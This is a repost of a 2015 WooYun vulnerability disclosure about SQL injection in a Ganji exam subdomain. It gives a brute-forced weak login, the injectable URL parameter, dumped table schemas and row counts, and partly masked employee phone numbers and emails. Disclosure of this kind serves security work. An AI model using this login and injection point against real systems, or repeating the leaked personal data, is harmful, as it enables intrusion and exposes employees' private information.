记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

赶集网某分站SQL注入(敏感信息泄漏)

2015-10-28 15:10

code 区域
http://kaoshi.corp.ganji.com

mask 区域
*****rai*****



爆破,弱口令一枚

wangpeng/000000

1.png





登进去之后注入





code 区域
http://kaoshi.corp.ganji.com

mask 区域
*****rai*****

ExamPage/ViewPaper.aspx?Clerk_kscj_ID=dd2bdf0c-e1ec-4e20-a973-d29733e87741





2.png





3.png







code 区域
Database: WebExamGJW

Table: StudentInfo

[38 columns]

+-------------+----------+

| Column | Type |

+-------------+----------+

| ActualName | varchar |

| Address | varchar |

| Birthday | datetime |

| Code | varchar |

| CreatedTime | datetime |

| Degree | smallint |

| Department | varchar |

| Duty | varchar |

| EMail | varchar |

| Id | varchar |

| Integral | int |

| JoinTime | datetime |

| ManagerId | varchar |

| Mobile | varchar |

| Name | varchar |

| OtherC1 | varchar |

| OtherC2 | varchar |

| OtherC3 | varchar |

| OtherC4 | varchar |

| OtherC5 | varchar |

| OtherC6 | varchar |

| OtherC7 | varchar |

| OtherC8 | varchar |

| OtherC9 | varchar |

| OtherD1 | datetime |

| OtherD2 | datetime |

| OtherI1 | int |

| OtherI2 | int |

| OtherI3 | int |

| OtherI4 | int |

| Password | varchar |

| Post | varchar |

| SerialNO | bigint |

| Sex | int |

| Status | smallint |

| Tel | varchar |

| UserId | varchar |

| WorkType | varchar |

+-------------+----------+





code 区域
Database: WebExamGJW

+----------------------------+---------+

| Table | Entries |

+----------------------------+---------+

| dbo.ExamAnswerInfo | 63141 |

| dbo.LogInfo | 20480 |

| dbo.ExamTemp | 8663 |

| dbo.LoginInfo | 7878 |

| dbo.StudentPointLog | 7001 |

| dbo.Clerk_Cl | 4631 |

| dbo.Clerk_Cl | 4631 |

| dbo.clerk_kscj | 4002 |

| dbo.vwLoginSumInfo | 3823 |

| dbo.StudentInfo | 2342 |

| dbo.V_Clerk_Kscj_Cj | 2245 |

| dbo.V_Clerk_Kscj_Cj | 2245 |

| dbo.ExamStart | 2118 |

| dbo.SuitDetailInfo | 2020 |

| dbo.vwPassScore | 1677 |

| dbo.tk001 | 1435 |

| dbo.vwStudentSysAccessInfo | 235 |

| dbo.tk_cl_ndzsd | 125 |

| dbo.tk_cl_ndzsd | 125 |

| dbo.ExamApply | 107 |

| dbo.tk_cl_tx | 75 |

| dbo.Department | 74 |

| dbo.SysAccessAssignInfo | 68 |

| dbo.UserOptionInfo | 63 |

| dbo.tk_lx | 58 |

| dbo.PaperSuitInfo | 57 |

| dbo.StudentRoleInfo | 39 |

| dbo.SysAccessInfo | 39 |

| dbo.SysMessageInfo | 30 |

| dbo.tk_tkj | 20 |

| dbo.TkCategoryInfo | 11 |

| dbo.RoleInfo | 9 |

| dbo.SysMenuInfo | 8 |

| dbo.Tm_tx | 7 |

| dbo.UserInfo | 4 |

+----------------------------+---------+





code 区域

mask 区域
*****meAddressJoinTimeNameOthe*****

*****11 2015 3:36PM<blank>09 11 2015 3:36PM[email protected] *****

*****9 11 2015 11:01AM1355979005209 11 2015 12:00AM[email protected] *****

***** 2015 11:01AM1810630244909 11 2015 11:01AM[email protected] *****

*****1 2015 11:01AM1382915004509 11 2015 11:01AM[email protected] *****

*****2015 11:47AM1358903278809 11 2015 11:47AM[email protected] &*****

*****9 11 2015 5:13PM<blank>09 11 2015 12:00A*****

*****2015 11:01AM<blank>09 11 2015 11:01AM[email protected] *****

*****11 2015 11:33AM1396668555009 11 2015 11:33AM[email protected] *****

*****武09 11 2015 11:01AM1862689102009 11 2015 11:01AM2818280559@q*****

*****1 2015 11:01AM1596027896709 11 2015 11:01AM[email protected] *****

***** 2015 11:47AM1883481637609 11 2015 11:47AM[email protected] *****

*****2015 11:47AM1510448922809 11 2015 11:47AM[email protected] &*****

***** 2015 11:01AM1508866134709 11 2015 11:01AM[email protected] &*****

***** 11 2015 11:01AM入职超3个月09 11 2015 11:01AM1465049936@qq*****

***** 11 2015 11:47AM1525424888109 11 2015 12:00AMyangjinlong@qdganj*****

*****2015 12:01PM1329709322309 11 2015 12:01PM[email protected] &*****





一部分

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0140784

阅读:94029 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“赶集网某分站SQL注入(敏感信息泄漏)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词